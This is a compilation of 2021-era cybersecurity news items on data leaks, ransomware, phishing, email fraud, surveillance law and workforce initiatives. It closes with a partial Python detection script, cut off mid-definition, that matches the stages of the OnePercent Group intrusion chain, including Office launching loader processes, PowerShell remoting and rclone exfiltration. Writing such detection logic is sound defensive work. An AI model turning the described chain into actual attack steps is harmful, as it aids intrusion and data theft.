A Chinese game developer has unwittingly exposed the personal and device details of over a million players after leaving an internet-facing server unsecured, according to researchers.
A team at vpnMentor led by Noam Rotem and Ran Locar discovered the unprotected Elasticsearch server on July 5. After receiving no reply from its owner, EskyFun Entertainment Network Limited, they contacted the Hong Kong CERT, and the next day, July 28, the database was secured.
The 134GB trove contained an estimated 365 million records linked to players of the firm’s fantasy games: Rainbow Story: Fantasy MMORPG; Metamorph M; and Dynasty Heroes: Legends of Samkok.
This giant collection of user records is even more noteworthy given the firm collected only a rolling log of the previous seven days’ records, with anything older deleted to make way for fresh data.
“The reason for the sheer size of the data exposed appears to be EskyFun’s aggressive and deeply troubling tracking, analytics, and permissions settings,” vpnMentor claimed. “EskyFun gains access and control to almost every aspect of a person’s device and even their private networks. Most of [the data] is totally unnecessary for the games to function.”
Among the data leaked via the unsecured server were IP address, device model, phone number, geolocation and buyer account ID. The researchers also found over 217 million email addresses and plaintext EskyFun passwords.
The vpnMentor team estimated the number of users affected at over one million due to the number of Android downloads the three affected games have: around 1.5 million.
“Combining a user’s email address, gaming history, and support requests, hackers could send thousands of phishing emails posing as EskyFun’s support,” the researchers wrote.
“The database also contained plenty of data to build a profile of users and identify two vulnerable groups: high-paying accounts and children. By focusing on these users, hackers could reap huge financial rewards from a small group of victims.”
Cyber-criminals could also have used the plaintext passwords to hijack users’ EskyFun gaming accounts or to support credential stuffing campaigns designed to unlock other accounts across the web that the same credentials may protect.
The most popular uses for facial recognition technology (FRT) by federal agencies are cybersecurity and digital access, according to a new report by the United States Government Accountability Office.
The GAO surveyed 24 agencies about their FRT activities in the fiscal year 2020 and found 75% (18) use an FRT system for one or more purposes.
Sixteen agencies reported deploying the technology for digital access or cybersecurity purposes, with two of these agencies (General Services Administration and Social Security Administration) saying that they were testing FRT to verify the identities of people who were accessing government websites.
The report stated that 14 of these 16 agencies "authorized personnel to use FRT to unlock their agency-issued smartphones — the most common purpose of FRT reported."
Six agencies said that they had been using FRT to generate leads in criminal investigations; for example, to identify a person of interest by comparing their image against mugshots.
"In some cases, agencies identify crime victims, such as exploited children, by using commercial systems that compare against publicly available images, such as from social media," stated the report.
Just over a quarter (27.5%) of agencies reported using FRT to monitor or surveil locations to control access to a building or facility or to detect the presence of an individual, such as someone on a watchlist.
More than half of the agencies (55%) reported FRT-related research and development that included examining the technology's ability to detect image manipulation and researching how accurately it could identify individuals wearing masks during the COVID-19 pandemic.
The Department of Justice reported conducting applied research on the capabilities and limitations of current synthetic face detection, such as deepfakes, and the relationship between skin tone and false match rates in facial recognition algorithms.
Plans to expand their use of FRT through to 2023 were reported by 10 of the 18 agencies, with one agency planning to pilot the use of FRT to automate identity verification processes for travelers at airports.
The US Treasury Inspector General for Tax Administration reported buying an FRT system that can identify facial images of criminal suspects. The system searches an online image cache that includes evidence from seized devices for potential matches of individuals linked to other investigations.
Police in Arizona have arrested a Tennessee man who went on the run after being indicted over a scheme to profit from confidential records belonging to the Memphis Police Department (MPD).
On Wednesday, US Marshal Tyreece Miller announced the arrest of Roderick Harvey for bribery of a public servant and violation of a computer act over $10,000.
The Tennessee Bureau of Investigation (TBI), working with the US Marshals Two Rivers Violent Fugitive Task Force, tracked Harvey to Phoenix, where he was detained without incident and booked into the Maricopa County Jail.
Miller said: “Despite Harvey’s attempt to evade arrest by traveling over a thousand miles, he was safely apprehended.”
Harvey was one of nine people indicted by a Shelby County Grand Jury on August 6 following a year-long investigation by the TBI that began in June 2020.
The probe was requested by district attorney general Amy Weirich after former Shelby County assistant district attorney Glenda Adams was fired from her role and investigated after allegedly misusing confidential information.
Harvey's alleged co-conspirators include Adams, three former employees of MPD, and a personal injury attorney with Wells & Associates. The TBI investigation found that Adams, Harvey, Egypt Berry, Latausha Blair, Renatta Dillard, Marcus Lewis, Aaron Neglia, Martin Nolan, and Mustafa Sajid “were responsible for an elaborate scheme to profit from the use of confidential information in Memphis police reports.”
Case prosecutor Bryant Dunaway said the scheme involved buying information about traffic crashes from government employees before that information became public.
He said: "It seems to be there's big business in personal injury attorneys and others to acquire information on crash victims, early, before it's available to the public. It's kind of a race to get there."
Adams, Berry, Lewis, Neglia, Nolan and Sajid are all accused of bribing a public servant. Adams, Berry, Blair, Dillard, Neglia and Nolan are accused of a violation of the computer act over $10,000. Adams, Berry and Nolan are accused of official misconduct.
Berry and Dillard were in custody by August 6, and all the other defendants except Harvey made arrangements to turn themselves in to law enforcement.
The TBI said the investigation remains ongoing and “more indictments are expected.”
The attorney general of New Mexico has brought a lawsuit against a Finnish game developer over its treatment of children's data.
In the complaint, Hector Balderas accuses Rovio Entertainment of illegally collecting the data of children under the age of 13 who play the puzzle video game Angry Birds.
Rovio is further accused of sending the children's data to multiple third-party marketing companies that analyze, repackage, resell and otherwise use the information to sell targeted advertising to those children.
The suit states: "Rovio monetizes children by surreptitiously exfiltrating their personal information while they play the Angry Birds Gaming Apps and then using that personal information for commercial exploitation."
Developers of child-directed games are required under the federal Children’s Online Privacy Protection Act (COPPA) to obtain parental consent before collecting any personal information from players. Creators whose games are targeted at a wide age range must still take action to ensure that data belonging to users under the age of 13 is not collected.
"The State’s complaint alleges that Rovio has deliberately attempted to turn a blind eye to its enormous child audience, while simultaneously marketing the Angry Birds games to kids through movies, lunch boxes, kids’ meals, and more," wrote the New Mexico attorney general's office in a statement released Wednesday.
New Mexico is seeking an injunction to prohibit Rovio's data collection practices. The state is also pursuing civil penalties and restitution from the Finnish game developer.
“Parents must have the power to protect their children and determine who can have access to their child’s personal data, and New Mexican parents are being misled about what information is being collected from their children,” said Balderas.
“This company must follow the law, and we will always hold companies accountable that risk the safety of children.”
Angry Birds is a simplistic game in which cartoon birds are launched from a giant slingshot to knock down structures erected by green cartoon pigs.
Since the game series was launched in 2009, its 35 spin-off games have been downloaded more than 4.5 billion times collectively, making Angry Birds the most downloaded freemium game series of all time.
The UK Cyber Security Council has today announced it has opened its membership application process.
The self-regulatory body for the cybersecurity education and skills sector, which launched as an independent entity earlier this year, is now inviting applications from eligible organizations throughout the UK. These are any organizations “with an interest in promoting, supporting and developing the cybersecurity profession.”
Those organizations whose membership applications are accepted will be allowed to nominate representatives to the Council’s committees, focusing on the core activities of professional standards, qualifications and careers, ethics and diversity.
Don MacIntyre, interim CEO for the UK Cyber Security Council, commented: “Professional standards, qualifications and careers, ethics and diversity are the stand-out issues facing the profession and its practitioners. Businesses with an interest in cyber security will never have a better opportunity to influence the direction and development of these and other issues than to join the Council and getting involved.”
The Council added that it would be putting in place engagement mechanisms to gather views from member organizations and use these insights to inform activities and decisions. MacIntyre said: “It is only through building an actively engaged community of members that the Council will be able to speak as the representative voice for the UK’s cyber security profession. With every new membership, our voice becomes clearer, louder and increasingly more difficult to be ignored.”
The UK government commissioned the UK Cyber Security Council in 2018 to promote and steward standards across the industry, and the overarching aim of helping close the UK’s cyber skills gap.
In June, the Council announced its first two initiatives as part of its remit to boost professional standards in the cyber industry. These were to determine the terms of two committees: a Professional Standards & Ethics Committee and a Qualifications & Careers Committee. These committees are tasked with helping ensure a common set of standards are adopted throughout education and training interventions related to cybersecurity. The Council also revealed it would be working on an initial mapping of CyBOK’s Qualifications Framework onto a public-facing Career Pathways Framework.
For more information on how to apply for membership to the Council, visit: https://www.ukcybersecuritycouncil.org.uk/membership/
Personal and clinical data of more than 73,000 patients have been affected by a “sophisticated ransomware cyber-attack” on a private medical clinic in Singapore.
In a press release, Eye & Retina Surgeons revealed the attack took place on 6 August, compromising sensitive data including patients’ names, addresses, ID card numbers, contact details and clinical information. However, no credit card or bank account details were accessed or compromised in the incident.
“Patients are now being progressively informed of this cyber-incident,” the release stated.
The clinic confirmed that the attack impacted servers and several computer terminals at its branch in Camden Medical, although none of its other branches were affected. Thankfully, none of the eye specialist’s clinical operations were affected, and its IT systems have now been securely restored.
The company noted it “maintains segregated networks and active medical records are maintained separately on a cloud-based system and thus were not accessed or compromised.”
The incident was reported to the Personal Data Protection Commission and the Singapore Computer Emergency Response Team (SingCERT), while the Eye & Retina Surgeons’ IT team is working with the Cybersecurity Agency of Singapore (CSA) and the Ministry of Health (MOH) to investigate the causes and perpetrators of the attack.
The clinic said there is no evidence that any compromised data has been published, but it will continue to monitor the situation. It added: “(Eye & Retina Surgeons) regrets this breach and wishes to assure its patients that it takes patient confidentiality very seriously.”
In a separate statement, Singapore’s MOH reassured citizens that the compromised systems are not connected to its own IT network, including the National Electronic Health Record, and “there have been no similar cyberattacks on MOH’s IT systems.”
It added: “Following this incident, MOH will be reminding all its licensed healthcare institutions to remain vigilant, strengthen their cybersecurity posture, and ensure the security and integrity of their IT assets, systems, and patient data. It is only through the disciplined maintenance of a safe and secure data and IT system that healthcare professionals will be able to deliver accurate and appropriate care and uphold patient safety.”
Commenting on the story, Jonathan Knudsen, senior security strategist at the Synopsys Software Integrity Group, said: “Every organization is a software organization, even an eye clinic. All organizations, no matter their size or industry, must include cybersecurity as part of their day-to-day operations. A comprehensive, proactive approach to security reduces risk for the organization and its customers.
“In the case of Eye & Retina Surgeons, segmenting the network between administrative functions and medical data was a smart defensive move and prevented this attack from being much worse. This technique is part of the basic security hygiene that all organizations should practice. Even with the best defenses, things can still go wrong. Incident planning helps the organization be prepared to remediate problems and notify customers and authorities.”
The UK government’s preferred candidate to be the next information commissioner is John Edwards, who currently serves as New Zealand’s privacy commissioner.
The information commissioner plays an increasingly important role in the UK’s regulatory landscape following the country’s departure from the EU.
The Information Commissioner’s Office (ICO) is an independent body that regulates the GDPR and its UK equivalent, the Data Protection Act 2018, as well as the Freedom of Information Act, the NIS Directive — transposed into UK law as the Network and Information Systems Regulation 2018 — and the Privacy and Electronic Communications Regulations (PECR), which govern nuisance calls and spam.
Edwards was appointed privacy commissioner in 2014 and is currently serving his second five-year term in New Zealand. He brings with him over two decades of regulatory and legal experience.
Edwards will now appear before MPs on the Digital, Culture, Media and Sport Select Committee for pre-appointment scrutiny on September 9.
He will arrive at a key moment for the UK as it seeks to strike multibillion-pound “data adequacy” agreements with the US, Australia and South Korea, and navigate a tricky relationship with the EU.
Although the bloc has adopted a data adequacy decision enabling the free flow of information to and from the continent, it may be challenged in court given concerns that the UK’s intelligence services could snoop on European citizens’ data.
“There is a great opportunity to build on the wonderful work already done and I look forward to the challenge of steering the organisation and the British economy into a position of international leadership in the safe and trusted use of data for the benefit of all,” said Edwards.
Current information commissioner Elizabeth Denham claimed her office had supported innovation while driving public trust in data use during the pandemic.
“Implementing any changes parliament decides on will fall to my successor, who will take on a role that has never been more important or more relevant to people’s lives,” she added.
“John Edwards would bring extraordinary breadth, international leadership and credibility to this role. He will receive the support of a modern, independent ICO that has the courage, resources and expertise to make a positive difference to people’s lives.”
Over 1,850 teenagers signed up for a government-backed cybersecurity skills initiative this summer, a record number, according to the National Cyber Security Centre (NCSC).
The CyberFirst summer course is run by the GCHQ off-shoot and went online-only last year during the pandemic.
That saw record participation which has been surpassed again in 2021, the NCSC claimed. The number of applications this year was also record-breaking, increasing from 3,909 in 2020 to 4,384.
The course itself is open to 14 to 17-year-olds and covers topics such as digital forensics, ethical hacking and cryptography. Pupils now have the option of attending in person at a location in Warwickshire or completing it online.
This year, 43% of attendees were girls, and nearly half (47%) were pupils from ethnic minority backgrounds. Both groups are under-represented in the industry.
CyberFirst courses are intended to spur and nurture an interest in cybersecurity, which will ultimately help close major skills shortages and gaps in the sector.
According to the government, half (50%) of businesses have a basic skills gap — which means those in charge of cybersecurity don’t have the confidence to perform basic tasks. Meanwhile, the shortage of cyber professionals in the UK is estimated at over 27,000, according to the ISC2.
“It’s fantastic to see so many young people engaging with cyber security and developing the skills that will help them thrive in the industry,” said Chris Ensor, NCSC deputy director for cyber growth.
“Our summer courses provide fun, hands-on opportunities to learn about defending our digital world and we hope they will be inspired to pursue their interests further. The next generation of cyber experts must be diverse as well as skilled, and through CyberFirst we are committed to making the industry a more accessible and inclusive place for all.”
More than 55,000 students have taken part in CyberFirst courses and the Girls Competition since 2016.
Some of the world’s biggest tech companies have committed tens of billions of dollars to improving supply chain security, closing industry skills gaps and driving security awareness among the public, according to the White House.
As reported by Infosecurity yesterday, the Biden administration welcomed the CEOs of Microsoft, Apple, Google, IBM and others to a meeting yesterday to discuss the “whole-of-nation” effort needed to address cybersecurity threats.
The result of that encounter has been a series of commitments from these firms, including $10bn from Google over the next five years to expand zero trust and improve supply chain and open source security. The tech giant will apparently also help 100,000 Americans earn “digital skills certificates.”
IBM said it would train 150,000 people in cyber skills over the coming three years and focus on improving the diversity of the security workforce, while Microsoft has committed $20bn over five years to drive security by design, and $150m for federal, local and state governments.
Apple will establish a new program to improve supply chain security, including among its 9000 US suppliers, with multi-factor authentication (MFA), vulnerability remediation, event logging and incident response all playing a key role.
Amazon is making MFA devices available to all AWS customers and rolling out the security training it offers employees to the general public.
Aside from these commitments, the White House announced the expansion of its Industrial Control Systems Cybersecurity Initiative, from the electricity sector to natural gas pipelines, and said the National Institute of Standards and Technology (NIST) would develop a new framework for supply chain security.
In another potentially significant move, insurer Resilience said it would require policyholders to meet a threshold of cybersecurity best practice as a condition of receiving coverage — something experts have been demanding for some time across the industry.
“I’m especially excited to see that Resilience is requiring minimum cybersecurity standards as a condition of coverage,” argued Jake Williams, co-founder and CTO at BreachQuest. “Many organizations view cyber-insurance as an alternative to implementing security controls rather than as a complement to those controls.”
There were also pledges from several education providers to help improve security awareness among the public and grow America’s cyber workforce. The White House claimed it currently has a skills shortage of nearly 500,000 professionals.
“We applaud Amazon’s commitment to make security awareness training available at no charge and to deliver multi-factor authentication (MFA) to all Amazon Web Services account holders. Such basic defenses should be in place everywhere,” argued Jack Kudale, founder and CEO of Cowbell Cyber.
“The security crisis is acute within the small and mid-size business segment. Incentives to drive change and adoption of fundamental cyber-hygiene practices including cybersecurity and cyber-insurance will change the balance of power between businesses and cyber-criminals.”
A coalition bill that grants the police more powers to spy on criminal suspects online has been passed by the Australian government.
The Surveillance Legislation Amendment (Identify and Disrupt) bill has created three new types of warrants that enable the Australian Federal Police (AFP) and Australian Criminal Intelligence Commission (ACIC) to modify and delete data belonging to cybercriminal suspects and take over their accounts.
Using the new data disruption warrants, the AFP and the ACIC can prevent serious offenses from being committed online by modifying, adding, copying or deleting data. Network activity warrants allow the agencies to gather intelligence on criminal activity being carried out by cyber-criminal networks, while account takeover warrants can be used to take control of a suspect's online account.
An eligible judge or a nominated member of the administrative appeals tribunal (AAT) can issue the data disruption and network activity warrants. However, the account takeover warrants must come from a magistrate who is satisfied that there are reasonable grounds that such a step is required to collect evidence relating to a relevant offense.
On Tuesday, Labor MP Andrew Giles told the lower house that the bill had gained the support of the opposition because “the cyber-capabilities of criminal networks have expanded, and we know that they are using the dark web and anonymizing technology to facilitate serious crime, which is creating significant challenges for law enforcement.”
The Greens flagged that the new powers go against a central recommendation of the Richardson review of the legal framework for Australia's intelligence community. Richardson found that “law enforcement agencies should not be given specific cyber-disruption powers.”
Recommendations to improve safeguards and oversight concerning the new powers were made earlier this month by the parliamentary joint committee on intelligence and security (PJCIS), though not all of them were implemented.
The committee can review the bill after four years, and the Independent National Security Legislation Monitor will review the bill in 2024.
Kieran Pender, senior lawyer at the Human Rights Law Centre, told Guardian Australia that the new powers granted to the AFP and ACIC under the bill “are unprecedented and extraordinarily intrusive."
Private data belonging to an alleged treaty violator was accessible to unauthorized FBI agents for months because of a software program flaw.
Former Ethereum developer Griffith was arrested at Los Angeles International Airport in November 2019 and charged with violating the International Emergency Economic Powers Act by traveling to the Democratic People’s Republic of Korea to give a presentation and technical advice on using crypto-currency and blockchain technology to evade sanctions.
In January 2020, in a Southern District of New York courthouse, Griffith pleaded not guilty to the charge.
The Palantir defect exposed data that had been recovered from Griffith's Twitter and Facebook accounts in March 2020 during the execution of a federal search warrant. Prosecutors in the case against Griffith, who described the glitch in a letter, said it pertained to the program's default setting.
“When data is loaded onto the Platform, the default setting is to permit access to the data to other FBI personnel otherwise authorized to access the Platform,” wrote prosecutors.
The prosecutors wrote that word of the unauthorized access came to Griffith's assigned FBI case agent via an email sent by another agent. The email explained that material seized in the search and entered into Palantir under the program's default settings had been accessed by an FBI analyst.
A letter filed by the Bureau on Tuesday states: “An FBI analyst, in the course of conducting a separate investigation, had identified communications between the defendant and the subject of that other investigation by means of searches on the Platform that accessed the Search Warrant Returns.”
Prosecutors learned that three FBI analysts and an agent had viewed Griffith's private data owing to the Palantir glitch. None of the FBI employees who accessed Griffith's data were working on his case.
Between May 2020 and August 2021, the seized material was accessed at least four times.
Griffith is scheduled to appear in court on September 21.
The Personal Identifiable Information (PII) of approximately 12,000 cardiology patients has been exposed in a cyber-attack on a healthcare provider based in Utah.
Patient data in the care of Revere Health was compromised when the organization fell victim to a phishing attack on June 21, 2021.
An attacker impersonating the US Agency for International Development (USAID) sent an email to a Revere Health employee that contained a malicious link. When the employee clicked the link, they inadvertently gave the threat actor access to their login credentials.
The attacker used the stolen credentials to log in to an employee email account that contained information belonging to patients of Revere Health’s Heart of Dixie Cardiology Department in St. George, Utah. No credit card or payment information was among the data accessed by the attacker.
In a patient notification statement, Revere Health said that the compromised data was limited to patient names, dates of birth, medical record numbers, provider names, procedures, and information about appointments.
"Since this data is relatively limited, we believe that this poses a low-level risk to your personal information," said the organization.
It continued: "We have no reason to believe that they [the attacker] accessed, or were interested in, patient information. However, we cannot completely rule this out."
Revere Health said that active monitoring by its IT security team detected the unauthorized activity quickly. Within 45 minutes of the attack commencing, the team was able to sever unauthorized access to the compromised email account.
An investigation into the incident led Revere Health to conclude that stealing patient data was not the assailant's main intention.
"From our detailed investigation of this incident, we believe that the intent of this attack was to harvest login credentials from individuals in our organization and not to gather patient information," stated the healthcare provider.
"Our security logs suggest that the attacker had three objectives: (1) to spread phishing emails, (2) to gather active usernames and passwords and (3) to attempt financial fraud against Revere Health."
Following the incident, Revere Health has updated its security awareness training, enhanced suspicious activity detection protocols, and accelerated its rollout of two-factor authentication software.
More than two-thirds (70%) of cybersecurity professionals believe that the issue of ransomware is being exacerbated by cyber-insurance payouts to victim organizations, according to a new study by cybersecurity firm Talion.
The survey of 200 UK cybersecurity professionals also unveiled some worrying findings about reporting ransomware attacks to law enforcement. When asked why so many attacks are not reported, nearly half (45%) of respondents said that they believe businesses think law enforcement slows down ransomware recovery and they are focused on getting their systems back online. More than a third (37%) said it was because companies have paid a ransom and don’t want to get into trouble.
Additionally, one in 10 of those surveyed said companies didn’t know how to report ransomware attacks to law enforcement.
The report follows a surge in ransomware attacks globally in 2021. Earlier this month, a study from the International Data Corporation (IDC) found that over one-third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months. This has led to numerous eye-watering ransoms being paid to cyber-criminals, ramping up the debate on whether it is ever acceptable to pay a ransomware demand.
Commenting on the study, Mike Brown, CEO of Talion, said: “Our study highlights that many organizations are concerned about reporting ransomware attacks to law enforcement out of fear it could have further negative repercussions. All victims want to get back to business as usual as quickly as possible; however, it can be a complicated landscape to navigate. Should you pay the ransom? If so, is it lawful? Organizations should be mindful that it is unlawful to make a payment to terrorist organizations or prescribed groups in breach of international sanctions. What is required is a clear legal framework that allows organizations to make the best, lawful decisions when they are in this high-stress situation. Law enforcement needs to find a way to work with a commercial organization so that they are viewed as a source of expertise and support, not a further obstacle to overcome.”
“In terms of insurance payouts, it is not surprising so many security professionals see them as fuelling the ransomware industry, as they certainly cushion the blow of attacks. However, payouts are not guaranteed, and insurers are getting stricter every day. The best option is, therefore, to prepare for attacks and rehearse your strategy so when your organization gets hit in real life, losses are kept to a minimum.”
In June, Talion launched the #RansomAware campaign, a coalition of cyber security experts, businesses, academia and government to facilitate collaboration and information sharing around ransomware.
Developing more innovative hiring practices is crucial to attracting more talent to the cybersecurity industry, according to panelists speaking during a recent RSA webcast.
The event was held amid growing efforts from the US federal government to attract new candidates to the cybersecurity industry to close the burgeoning skills gap.
Barbara Endicott-Popovsky, executive director of Center for Information Assurance and Cybersecurity and professor at the University of Washington, stated: “It’s been frustrating to watch the lack of awareness of the cyber threats that we face and even more frustrating to spend so much time as we have developing talent and trying to make sure we get the right people to the right places.”
The first step in addressing this issue is to ensure there is much more clarity about the types of people and skills that are needed to work in cyber, according to Lynn Clark, chief of the NSA/DHS Centers of Academic Excellence at the National Security Agency (NSA). “It’s really hard to produce educational programs to prepare people for the workforce if we don’t know what our end objective is,” she outlined.
It is also vital that cybersecurity recruiters recognize the wide variety of motivations candidates have to work in this sector, thereby ensuring they “use the right lure for the right fish,” said Joshua Corman, senior advisor for the Cybersecurity and Infrastructure Security Agency (CISA).
He listed five different drivers (p’s) for those who work in the industry: protectors, purpose, prestige, profit and protest/patriotism, adding that “how you engage and recruit them will be different.”
The discussion then turned to the types of people and skills needed to make up the industry. Endicott-Popovsky observed that traditionally, the cyber industry has primarily been comprised of ‘techies,’ meaning other important skill sets are lacking.
Emily Harding, deputy director and senior fellow with the International Security Program at the Center for Strategic and International Studies (CSIS), said that in her experience, character and mindset are more important than qualifications when looking to recruit candidates for cybersecurity jobs. She believes the ideal person needs to be “smart and can think, and who does not get discouraged by bureaucracy or small hurdles, somebody who doesn’t want a roadmap to accomplish things.”
As well as hackers who can use their technical skills to discover security flaws, Corman feels the cyber industry needs more ‘translators’ in its ranks to translate these flaws into action. During previous experiences, he found that people with backgrounds in areas like law and project management are particularly effective at this role. “The things we were able to do were because we came from incredibly different backgrounds, but we had a common cause, common purpose and could be brought together like a team of Avengers to fight the greatest foes and risks,” he added.
Clark concurred with these perspectives, emphasizing the need for security teams to be made up of people with strong soft skills, such as communication and collaboration, alongside “people who understand the technology.” She pointed out, “All the technology in the world is not going to protect us from the hacker who can socially engineer somebody into giving him a password or who can spearphish and get the important information they need to access our systems.”
The panel also agreed that organizations need to adapt their standard requirements for cybersecurity candidates to enable this type of neurodiversity to become a reality. This includes working with HR and legal departments to reduce the emphasis on formal technical qualifications. Additionally, Harding believes “you have to have that human-to-human connection as much as possible, where you’re going out to career fairs and universities and recruiting.”
The principle of favoring character over qualifications is particularly pertinent when it comes to recruiting for leadership positions. Corman observed that individuals are often pushed into leadership roles based on their technical expertise, which are the wrong criteria to use. “You have to make sure you have the right leaders because they set the tone, the cadence, the value set, the culture, as best they can,” he noted.
More broadly, Corman said that all personnel operating in the rapidly evolving field of cybersecurity must be flexible and willing to learn on the job continuously. “An adaptable person will adapt at the speed of cyber,” he commented.
A drug dealer has been given a ten-year jail sentence after officers monitored his encrypted communications with other suppliers, according to the National Crime Agency (NCA).
Lee Broughton, 40 from Epsom, was sentenced last week at Kingston Crown Court after pleading guilty back in April to supplying cocaine.
His case was one of the many that the NCA is working on as part of Operation Venetic, after international law enforcers cracked a popular encrypted chat platform.
The agency revealed last year that it had been working on cracking EncroChat since 2015. The service is said to have had 60,000 users globally, 10,000 of whom were in the UK. It was reportedly used for trading drugs and other illegal goods, laundering money and planning hits on rivals.
The service offered users special devices, costing around €1000 each, and would charge €1500 for a six-month subscription offering worldwide coverage. Devices didn't require users to associate a SIM card with their account and used a dual operating system with an encrypted interface.
Law enforcers have already arrested over 700 individuals in the UK due to their success in infiltrating EncroChat.
Broughton used the username "Sleekyak" to communicate with 22 contacts via the service — boasting he could sell 10 to 20kg of cocaine per week. He was apparently linked to the EncroChat moniker after revealing in one conversation the date of his birthday.
In related news, Michael Devine, 45, from Pete Best Drive in Derby, was this week sentenced to 17 years behind bars after using EncroChat to discuss sailing hundreds of kilograms of cocaine across the Atlantic.
According to reports, police were able to unmask Devine as the individual behind the "lawfularbor" and "mixedtree" accounts thanks to his references to family members, his poker playing, his car and Costco membership.
Individuals and organizations lost three times more money to cybercrime and fraud in the first half of the year compared to the same period in 2020, as incidents soared, according to new figures.
The figures revealed that between January 1 and July 31, 2020, victims lost £414.7m to cybercrime and fraud. However, the figure surged to £1.3bn for the same period in 2021.
This can be partly explained by the huge increase in cases from last year to this. In the first half of 2020, there were just 39,160 reported to Action Fraud, versus 289,437 in the first six months of 2021.
In both periods, individuals comprised the vast majority of cases and the majority of losses. However, organizations lost 6.6 times more money in the first half of 2021 compared to 1H 2020, while individual victims lost 2.6 times more during the period.
Experts urged the government to do more to educate individuals about the dangers of phishing and the importance of cybersecurity best practices and argued that organizations should be more proactive in mitigating home working risks.
“The pandemic has opened up many opportunities for malicious hackers to intercept individuals, remote workers and businesses as we have been thrown out of our usual routines and away from the safety of corporate firewalls. For many businesses, the rush to move their products and services online, or into the cloud, has left the door open as cybersecurity took a back seat to business continuity,” explained Outpost24 CSO, Martin Jartelius.
“Across the country, millions of people have switched to working from home and have remained digital-only for the past 18 months. This gives hackers the time to test out different attack techniques, learn what works — sometimes from other hacking groups — and evolve their tactics to achieve maximum return.”
The CEOs of some of the world’s biggest tech companies are set to meet President Biden today to discuss how their products can improve the security of America’s businesses and critical infrastructure providers, according to a report.
Apple boss Tim Cook, Amazon CEO Andy Jassy and Microsoft supremo Satya Nadella are attending the meeting. The CEOs of Google, IBM, JP Morgan Chase and utility firm Southern Co have also been invited, according to Bloomberg.
A senior official familiar with the event told the news site that part of the discussion would be focused on how software can enhance supply chain security.
It’s thought that critical infrastructure could also be a focus — particularly in light of the Colonial Pipeline ransomware attack in May, which led to surging fuel prices for days up and down the US East Coast.
Digital supply chain attacks are also increasingly commonplace, with the SolarWinds campaign highlighting the lengths state-backed threat actors are prepared to go to infiltrate US government organizations. Microsoft claimed shortly after that over 1000 Kremlin operatives had worked on the campaign.
The line between state-sponsored and financially motivated cybercrime attacks has become increasingly blurred over recent months. The Kaseya ransomware campaign appeared inspired in some part by SolarWinds, targeting an IT management software provider to hit thousands of downstream customers.
The Biden administration appears more determined to tackle these challenges than its predecessor, although, to an extent, they have become more acute over the past few months.
The President himself warned last month that if a “real shooting war” broke out with a major power, it could result from a significant cyber incident.
That follows tense negotiations with the Kremlin over Russia’s apparent harboring of cybercrime groups like those that hit Colonial Pipeline, Kaseya and meat processing giant JBS USA.
He is reported to have told President Putin that critical infrastructure providers should be considered off-limits.
A New Hampshire town is reeling from the "very shocking" cybercrime that claimed more than 14% of its annual budget.
Peterborough is a 7,000-person town with a budget for the fiscal year of just over $15.8m. Cyber-thieves conned the town out of $2.3m through two business email compromise (BEC) scams.
First, the criminals used forged documents and compromised email accounts to pose as staff at the local school district. This enabled them to divert a million-dollar transfer made to the district by the town into a bank account under their control.
The theft came to light on July 26 when the ConVal School District notified the town that it had missed a $1.2m monthly payment.
On August 18 it emerged that cyber-thieves had stolen more money by posing as general contractor Beck and Bellucci, hired by the town to repair Main Street Bridge.
Town administrator Nicole MacStay and select board chair Tyler Ward said it was not yet clear whether any of the town's losses would be covered by their insurance policy.
In a phone interview on Tuesday, MacStay said: “It’s very shocking to us to be quite honest. It’s just been very difficult to work through all this, and try to do the best we can to recover these funds ... to mitigate the burden on our residents and taxpayers."
An investigation into the thefts has been launched by the United States Secret Service. While the investigation is carried out, the town's finance department staff have been placed on leave.
A press release issued by Ward and MacStay suggests that finance department staff were unwitting pawns in the thefts, which have been attributed to threat actors that appear to be based outside of the United States.
“Investigations into these forged email exchanges show that they originated overseas,” stated the release.
“These criminals were very sophisticated and took advantage of the transparent nature of public sector work to identify the most valuable transactions and focus their actions on diverting those transfers.”
The town is reviewing its procedures regarding electronic financial transfers and has canceled all automated clearing house transfers.
The Federal Bureau of Investigation's Cyber Division has issued a flash warning over an organized cyber-criminal gang calling itself OnePercent Group.
In a TLP: WHITE alert published Monday, the FBI said the group has been targeting companies in the United States since November 2020.
OnePercent's modus operandi is to use the threat emulation software Cobalt Strike to perpetrate ransomware attacks. The infection process begins in the victim's inbox.
"OnePercent Group actors compromised victims through a phishing email in which an attachment is opened by the user," states the FBI warning. "The attachment's macros infect the system with the IcedID banking trojan."
The malicious attachment appears as a zip file containing a Microsoft Word or Excel document. Once activated, the banking trojan downloads extra software onto the victim's computer, including Cobalt Strike, which the FBI said "moves laterally in the network, primarily with PowerShell remoting."
After accessing a victim's computer, OnePercent encrypts their data and exfiltrates it from the network using rclone. A virtual ransom note is left that tells the victim they have one week from the date of infection to make contact with the ransomware group.
"OnePercent Group actors’ extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data," warned the FBI.
If no contact is made, the group contacts the victim via a ProtonMail email address or over the phone using spoofed phone numbers. Victims are told that a small portion of their data will be leaked through The Onion Router (TOR) network and clearnet, unless a ransom payment is made.
Should a victim refuse to pay up after this initial "one percent leak," the ransomware group threatens to sell their data to the ransomware gang Sodinokibi (REvil) to publish at an auction.
The FBI said that OnePercent Group threat actors have been spotted entering a victim's network around a month before ransomware is deployed.
US companies are urged by the FBI to back up their critical data offline and use multi-factor authentication with strong passphrases to protect themselves from ransomware attacks.
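The intrusion chain the FBI describes above (zip attachment carrying a macro-enabled Office document, Office spawning a loader, lateral movement over PowerShell remoting, exfiltration with rclone) expressed as per-stage detection logic and run over constructed mail-gateway and endpoint log lines. This is an added example, not code from the FBI alert or from any vendor; the `key=value` log format, the host names, user paths and file names are invented, and the Office-child-process rule is a general heuristic rather than something the alert states. Correlating stages per host is what turns individually noisy matches into an alert worth acting on.

```python
"""Per-stage detection of the phishing -> macro -> PowerShell remoting ->
rclone chain over constructed log lines (added example, not FBI code)."""
import re
from collections import defaultdict

# Ordered stages of the reported chain; order lets the report show how far
# along a host appears to be.
STAGES = ("phish_attachment", "office_child_process", "ps_remoting", "rclone_exfil")

# Macro-capable Office extensions only (.docx/.xlsx deliberately do not match).
MACRO_DOC = re.compile(r"\.(docm?|xlsm?|xlsb)\b", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
# Generic heuristic (assumption, not from the alert): Office should not
# normally launch these script/loader hosts.
SUSPICIOUS_CHILDREN = {"rundll32.exe", "regsvr32.exe", "cmd.exe",
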